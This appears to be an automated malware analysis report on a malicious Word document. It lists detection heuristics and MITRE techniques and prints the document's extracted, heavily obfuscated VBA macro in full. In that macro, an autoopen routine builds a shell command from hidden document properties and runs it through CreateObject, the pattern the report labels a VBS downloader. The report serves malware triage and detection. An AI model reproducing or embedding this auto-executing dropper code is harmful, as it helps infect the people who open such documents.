Verdict: MALICIOUS
Risk Score: 192

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic indicates an auto-executing macro that uses 'CreateObject', suggesting that it is designed to download and execute a payload. The ClamAV detection 'Doc.Macro.VBSDownloader-6336817-0' supports this, pointing to a VBS downloader.
Heuristics (8)

- ClamAV: Doc.Macro.VBSDownloader-6336817-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `AeyUELwSa = "LyfsCMpymun" CreateObject(uMvWKNsFzRd + ugCunPaK("hafbyEHH") + ugCunPaK("gsbuMzRpUVs")).Run$ dZmAMvagz + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + LHxhzkDv, 0 CtHazuBRD = "rycMavpy"`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub autoopen() GnLpEPBGuvx`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11245 bytes |

SHA-256: 0714fc1ff579cafa9f7eff31fd7f01151db470060732224c619b9f668cdfec9a

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 236 of 275 identifiers look randomly generated (e.g. 'gTbYDYvnCFK'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function tBXRpcutKGy()
Dim aUyMWUfX()
xhkWNCwR = 7772
ReDim aUyMWUfX(7772)
aUyMWUfX(5756) = YrpPPTVkfY
aUyMWUfX(3925) = bRtPBPVLz
aUyMWUfX(6618) = 9766
aUyMWUfX(1268) = 3639
For xhkWNCwR = 195 To 4834
aUyMWUfX(xhkWNCwR) = xhkWNCwR
Next
End Function
Function bNZHkXXn()
Dim fgwcWMHGyB()
tDkCGBrV = 7093
ReDim fgwcWMHGyB(7093)
fgwcWMHGyB(3791) = vPaDUCnZ
fgwcWMHGyB(5504) = SFmtwbbMGNK
fgwcWMHGyB(1812) = cWEcUyXdZNE
fgwcWMHGyB(2665) = PWUYyzCcKws
fgwcWMHGyB(5997) = 3789
fgwcWMHGyB(6096) = 7664
fgwcWMHGyB(6787) = 9833
fgwcWMHGyB(5173) = 2568
fgwcWMHGyB(4031) = 8692
fgwcWMHGyB(1650) = 1540
For tDkCGBrV = 5297 To 3064
fgwcWMHGyB(tDkCGBrV) = tDkCGBrV
Next
End Function
Function rvKVpBYcu()
Dim tfzRDTrcM()
KSkCSdHXAED = 6811
ReDim tfzRDTrcM(6811)
tfzRDTrcM(2322) = AtztbeErwa
tfzRDTrcM(4292) = BWmDATcRZ
tfzRDTrcM(6219) = SrkHKEnV
tfzRDTrcM(1691) = GNsYckBaA
tfzRDTrcM(1553) = vdWwxkbEfaE
tfzRDTrcM(6398) = 1299
tfzRDTrcM(4502) = 452
tfzRDTrcM(3842) = 2596
tfzRDTrcM(4721) = 6226
For KSkCSdHXAED = 3469 To 302
tfzRDTrcM(KSkCSdHXAED) = KSkCSdHXAED
Next
End Function
Function uTHgFyyV()
Dim hHHLDTgS()
vFEENKuL = 6335
ReDim hHHLDTgS(6335)
hHHLDTgS(4533) = AxczdFwCbpa
hHHLDTgS(3443) = DLkLaUttwk
hHHLDTgS(2456) = 1483
hHHLDTgS(889) = 7409
hHHLDTgS(232) = 6145
For vFEENKuL = 6324 To 1071
hHHLDTgS(vFEENKuL) = vFEENKuL
Next
End Function
Function zyRhMZtEF()
Dim fTnNwrrLgAF()
svuKLgcmw = 4953
ReDim fTnNwrrLgAF(4953)
fTnNwrrLgAF(4597) = cBheKFWLWgx
fTnNwrrLgAF(2506) = XXXdnEykpYH
fTnNwrrLgAF(4417) = wgHZUYBb
fTnNwrrLgAF(4436) = VuUMkDrCwv
fTnNwrrLgAF(2230) = 3094
fTnNwrrLgAF(4629) = 8894
fTnNwrrLgAF(1882) = 6101
fTnNwrrLgAF(1650) = 226
fTnNwrrLgAF(1301) = 9588
fTnNwrrLgAF(3423) = 882
For svuKLgcmw = 1730 To 2054
fTnNwrrLgAF(svuKLgcmw) = svuKLgcmw
Next
End Function
Function kVfxxgeZTcx()
Dim cNhmaTXxm()
BmnMsurwx = 8738
ReDim cNhmaTXxm(8738)
cNhmaTXxm(2107) = rYpHhaXM
cNhmaTXxm(4239) = ssbeCguByfD
cNhmaTXxm(6984) = TyDznyPyeks
cNhmaTXxm(8257) = 312
cNhmaTXxm(133) = 6779
cNhmaTXxm(3494) = 6258
For BmnMsurwx = 5098 To 1531
cNhmaTXxm(BmnMsurwx) = BmnMsurwx
Next
End Function
Function zxDDnHtE()
Dim xxAHkeRpfGX()
BGLnTuFBWd = 2487
ReDim xxAHkeRpfGX(2487)
xxAHkeRpfGX(1258) = FusggnCkM
xxAHkeRpfGX(298) = vPtBDYEkrT
xxAHkeRpfGX(1863) = pgYZFanEX
xxAHkeRpfGX(1971) = TVrCVXdFsrN
xxAHkeRpfGX(332) = tAcsBWNwS
xxAHkeRpfGX(1618) = MzUGSBNYN
xxAHkeRpfGX(789) = 7981
xxAHkeRpfGX(2421) = 7966
xxAHkeRpfGX(138) = 4484
xxAHkeRpfGX(2163) = 9150
xxAHkeRpfGX(1103) = 1880
For BGLnTuFBWd = 438 To 2203
xxAHkeRpfGX(BGLnTuFBWd) = BGLnTuFBWd
Next
End Function
Function fvUmWakZZYK()
Dim TSWvdtKMh()
vwPpbCTn = 7944
ReDim TSWvdtKMh(7944)
TSWvdtKMh(7122) = tgNRdsMwt
TSWvdtKMh(3881) = brbXLzLWtH
TSWvdtKMh(2436) = muXZpUfPGaL
TSWvdtKMh(4599) = mCxafFNNa
TSWvdtKMh(1118) = 3467
TSWvdtKMh(2552) = 6452
TSWvdtKMh(7686) = 6721
For vwPpbCTn = 7878 To 7420
TSWvdtKMh(vwPpbCTn) = vwPpbCTn
Next
End Function
Function CgAdLyezp()
Dim PfDSCfau()
eHBADPnM = 5319
ReDim PfDSCfau(5319)
PfDSCfau(4753) = VXsMybXeaA
PfDSCfau(3102) = CNKLPEdUfm
PfDSCfau(1100) = LHcTEumpTTm
PfDSCfau(2463) = xaBCaVhG
PfDSCfau(2793) = 7975
PfDSCfau(4802) = 5773
PfDSCfau(2858) = 6001
PfDSCfau(4300) = 7075
PfDSCfau(4664) = 8911
For eHBADPnM = 2922 To 4875
PfDSCfau(eHBADPnM) = eHBADPnM
Next
End Function
Function wvFMSCtgSB()
Dim UDYkpKHVvc()
mmGwMYbWa = 3559
ReDim UDYkpKHVvc(3559)
UDYkpKHVvc(2024) = btKHhNusS
UDYkpKHVvc(2015) = uSRnWNHzvW
UDYkpKHVvc(1996) = LnDZbkwhpEY
UDYkpKHVvc(156) = 6808
UDYkpKHVvc(1741) = 3548
UDYkpKHVvc(1625) = 4118
For mmGwMYbWa = 1128 To 3240
UDYkpKHVvc(mmGwMYbWa) = mmGwMYbWa
Next
End Function
Function DKWTEVRRMBN()
Dim cXszFrzwURz()
cyLYRTKSSdC = 7004
ReDim cXszFrzwURz(7004)
cXszFrzwURz(3595) = gtyrxgwS
cXszFrzwURz(2615) = PzfKEZMsBW
cXszFrzwURz(5245) = BNZkwMNR
cXszFrzwURz(4066) = WRscespGr
cXszFrzwURz(3282) = FHMwanSUR
cXszFrzwURz(6547) = 2845
cXszFrzwURz(6240) = 4262
cXszFrzwURz(4314) = 5615
cXszFrzwURz(4342) = 3162
For cyLYRTKSSdC = 3463 To 1101
cXszFrzwURz(cyLYRTKSSdC) = cyLYRTKSSdC
Next
End Function
Sub autoopen()
GnLpEPBGuvx
End Sub
Public Function ugCunPaK(sTzHXsUeNU)
tMmWCUey = "rmMfctLacm"
fKRsfsgZ = "mxnhpYpvVp"
bvyasLRXW = "TebBPckhmY"
vnPCWPapE = "WEeWHwyKR"
ugCunPaK = ActiveDocument.CustomDocumentProperties(sTzHXsUeNU) + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + SNnkzEnw
nDgnYNfK = "MyYFnPtwV"
pLddYWdssm = "LufXWggS"
YBeANeFhLS = "USZAcLgMZ"
RvuFfAcCFL = "tndrdSutrZ"
zwPGrDwL = "AawfWVYe"
End Function
Public Function dZmAMvagz()
nXywrxED = "KMEtckFDb"
vXhCxGNDf = "MSryEeLx"
fUpMfRAmTtm = "PDZKSskkZW"
nHLDemZX = "MGRCSwyH"
ZFHHcWys = "hbUxpPAm"
RuUFXAPLH = "fLuFrCSY"
DFBrGCMHmkE = "SFbeZuebNsh"
fbtDPfDett = ugCunPaK("LfRkbnymP") + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + ugCunPaK("KaGzyXtDkNm") + ugCunPaK("NfKBcxXvzGh") + ugCunPaK("BDwuRPNPN")
BNVewnkk = "UrpABZmTnr"
naakDWndM = "yKZfYFAYKfy"
amRFZWXULCs = ugCunPaK("kgvXgFbt") + ugCunPaK("gTmRgTPkG") + ugCunPaK("VNbtSPzwZ") + ugCunPaK("UmCYHMCwU") + ugCunPaK("nmPWNzEc")
SekyzxBsr = amRFZWXULCs + fbtDPfDett
aRSdcDurYRy = "AswGHnGuMza"
dZmAMvagz = SekyzxBsr + ActiveDocument.BuiltInDocumentProperties("Comments") + ""
End Function
Public Function uMvWKNsFzRd()
uMvWKNsFzRd = ugCunPaK("FEdDZxrN") + ugCunPaK("eZumagfGLaB") + ugCunPaK("tAxtxcsvzy") + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + KchPUyEn
MKWVpBeUWF = "drvtgtct"
EfDPwTaYEhf = "VBdbzfhxLfT"
rrttvMkXNcu = "hfZVBCGu"
SfWpGGMC = "xpyLvgFxbmp"
End Function
Public Function GnLpEPBGuvx()
BBVYefYAFEs = "RgsMwNaxxA"
BUCypEWWysB = "VpuHFUHy"
PzpFxCyTEk = "yasuMSNfgZt"
zMUMfyTU = "gtPgLezx"
ygcySdhPWzL = "HcWFdLdNAWU"
AeyUELwSa = "LyfsCMpymun"
CreateObject(uMvWKNsFzRd + ugCunPaK("hafbyEHH") + ugCunPaK("gsbuMzRpUVs")).Run$ dZmAMvagz + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + LHxhzkDv, 0
CtHazuBRD = "rycMavpy"
UxYbtKtt = "UeETzdPx"
YhrwCtAuTuP = "fpxPUYNvbfn"
vkegstHms = "VHVnwvBkLE"
VyZTLaxE = "BbRdVHkfAZU"
End Function
Function KWgbkykHZP()
Dim RfxRMkmmzZ()
apHNVUBpU = 7904
ReDim RfxRMkmmzZ(7904)
RfxRMkmmzZ(1286) = xXcDTbkGSW
RfxRMkmmzZ(2064) = EMsevfdYYka
RfxRMkmmzZ(5661) = EMwVBBWVW
RfxRMkmmzZ(1307) = UBXmtnHhnTE
RfxRMkmmzZ(1470) = TXfbKEVeKC
RfxRMkmmzZ(73) = 5450
RfxRMkmmzZ(965) = 9043
RfxRMkmmzZ(229) = 4176
RfxRMkmmzZ(274) = 7658
RfxRMkmmzZ(6802) = 9707
For apHNVUBpU = 6746 To 204
RfxRMkmmzZ(apHNVUBpU) = apHNVUBpU
Next
End Function
Function KRLsRUxSsUC()
Dim VxVayeNKuY()
kxcsPUvhp = 9719
ReDim VxVayeNKuY(9719)
VxVayeNKuY(5743) = XrTSuwmVh
VxVayeNKuY(2356) = wMrdhDPCbE
VxVayeNKuY(9379) = AGvwbVmarcD
VxVayeNKuY(7940) = 8601
VxVayeNKuY(8579) = 5842
VxVayeNKuY(6218) = 4932
VxVayeNKuY(7419) = 7205
VxVayeNKuY(4097) = 3279
For kxcsPUvhp = 1802 To 5262
VxVayeNKuY(kxcsPUvhp) = kxcsPUvhp
Next
End Function
Function rspLFEBgVZ()
Dim CwwVvdVSvHE()
VSSWyeEK = 4631
ReDim CwwVvdVSvHE(4631)
CwwVvdVSvHE(2943) = KnLswFvuSNH
CwwVvdVSvHE(1407) = rXAPeuFkeE
CwwVvdVSvHE(2405) = rZfSvkrkUs
CwwVvdVSvHE(4079) = EYeXZuXzV
CwwVvdVSvHE(808) = 4846
CwwVvdVSvHE(2419) = 6206
For VSSWyeEK = 1315 To 2061
CwwVvdVSvHE(VSSWyeEK) = VSSWyeEK
Next
End Function
Function KuCFZsbGvfm()
Dim RuxuvpKcyh()
FMCSSBse = 2712
ReDim RuxuvpKcyh(2712)
RuxuvpKcyh(2072) = uHuEphMy
RuxuvpKcyh(2457) = NgyfMkumRn
RuxuvpKcyh(1760) = xfzSnfCFENf
RuxuvpKcyh(703) = rehrZhEW
RuxuvpKcyh(655) = 8514
RuxuvpKcyh(1385) = 6813
For FMCSSBse = 528 To 1670
RuxuvpKcyh(FMCSSBse) = FMCSSBse
Next
End Function
Function FFMwgaYM()
Dim FBdFYFybY()
fDvNBaxmpMw = 2610
ReDim FBdFYFybY(2610)
FBdFYFybY(1373) = PCkLDZhMgc
FBdFYFybY(865) = PehxeTTXude
FBdFYFybY(2007) = 6045
FBdFYFybY(1892) = 1724
FBdFYFybY(96) = 73
FBdFYFybY(2261) = 4950
FBdFYFybY(1865) = 902
For fDvNBaxmpMw = 2409 To 2155
FBdFYFybY(fDvNBaxmpMw) = fDvNBaxmpMw
Next
End Function
Function emrKSCdBkA()
Dim EPrzzbNhTDw()
YCcSTMZV = 4386
ReDim EPrzzbNhTDw(4386)
EPrzzbNhTDw(3407) = LYxmCkPnB
EPrzzbNhTDw(4277) = sbHVZmyS
EPrzzbNhTDw(713) = tehkErHMZ
EPrzzbNhTDw(1392) = bKpbxcVgck
EPrzzbNhTDw(3363) = 5378
EPrzzbNhTDw(2300) = 8663
EPrzzbNhTDw(1330) = 764
EPrzzbNhTDw(2300) = 2578
EPrzzbNhTDw(2226) = 1081
EPrzzbNhTDw(2022) = 3830
For YCcSTMZV = 2370 To 1408
EPrzzbNhTDw(YCcSTMZV) = YCcSTMZV
Next
End Function
Function UGHFGXMDmY()
Dim ptvYBrECdr()
TUcEUXCkuK = 9074
ReDim ptvYBrECdr(9074)
ptvYBrECdr(8210) = HDKVGwRavL
ptvYBrECdr(8972) = gkALasxL
ptvYBrECdr(8712) = hActVXbu
ptvYBrECdr(6182) = vcMkyVUtD
ptvYBrECdr(1196) = EfhGUuVXbdV
ptvYBrECdr(8154) = hyyxpMgkBT
ptvYBrECdr(6025) = 629
ptvYBrECdr(8192) = 190
ptvYBrECdr(6255) = 8494
For TUcEUXCkuK = 2971 To 8016
ptvYBrECdr(TUcEUXCkuK) = TUcEUXCkuK
Next
End Function
Function vsReyNEk()
Dim FGNPxDgR()
dNppxZwPpcb = 4284
ReDim FGNPxDgR(4284)
FGNPxDgR(357) = nLSUvpBn
FGNPxDgR(2296) = GmHrPzWe
FGNPxDgR(2084) = yBpTvyTCAX
FGNPxDgR(3032) = kFXYfefe
FGNPxDgR(3090) = 700
FGNPxDgR(2415) = 7683
FGNPxDgR(3723) = 1696
For dNppxZwPpcb = 3075 To 3180
FGNPxDgR(dNppxZwPpcb) = dNppxZwPpcb
Next
End Function
Function pCHhXMbL()
Dim gTbYDYvnCFK()
kSrFLzhF = 6984
ReDim gTbYDYvnCFK(6984)
gTbYDYvnCFK(1465) = MfhnzDds
gTbYDYvnCFK(1976) = NWtAppGka
gTbYDYvnCFK(3497) = UuXfxzyYkt
gTbYDYvnCFK(5413) = XPmZdgwFmB
gTbYDYvnCFK(5110) = wxwhYeCeBN
gTbYDYvnCFK(2916) = 4252
gTbYDYvnCFK(5255) = 813
gTbYDYvnCFK(222) = 4637
gTbYDYvnCFK(1608) = 5961
gTbYDYvnCFK(4251) = 6310
gTbYDYvnCFK(2972) = 6903
For kSrFLzhF = 3058 To 574
gTbYDYvnCFK(kSrFLzhF) = kSrFLzhF
Next
End Function
Function WhBTkeGK()
Dim YFxKLWsAfp()
wzGAvURR = 2449
ReDim YFxKLWsAfp(2449)
YFxKLWsAfp(1730) = eYhtkWzXts
YFxKLWsAfp(1916) = rWbMKXtXUt
YFxKLWsAfp(503) = 7093
YFxKLWsAfp(1507) = 9360
For wzGAvURR = 1171 To 1136
YFxKLWsAfp(wzGAvURR) = wzGAvURR
Next
End Function
Function SZcFhkaBYck()
Dim xwwxcbkkpw()
pSmPsyteH = 692
ReDim xwwxcbkkpw(692)
xwwxcbkkpw(339) = KxUbDzCKvv
xwwxcbkkpw(192) = UuLeTrtn
xwwxcbkkpw(199) = WSmyTyrgDpm
xwwxcbkkpw(307) = vrVhCxnBFmu
xwwxcbkkpw(511) = yMpmVNbxxZZ
xwwxcbkkpw(270) = 3133
xwwxcbkkpw(489) = 667
xwwxcbkkpw(566) = 887
xwwxcbkkpw(209) = 9747
For pSmPsyteH = 314 To 461
xwwxcbkkpw(pSmPsyteH) = pSmPsyteH
Next
End Function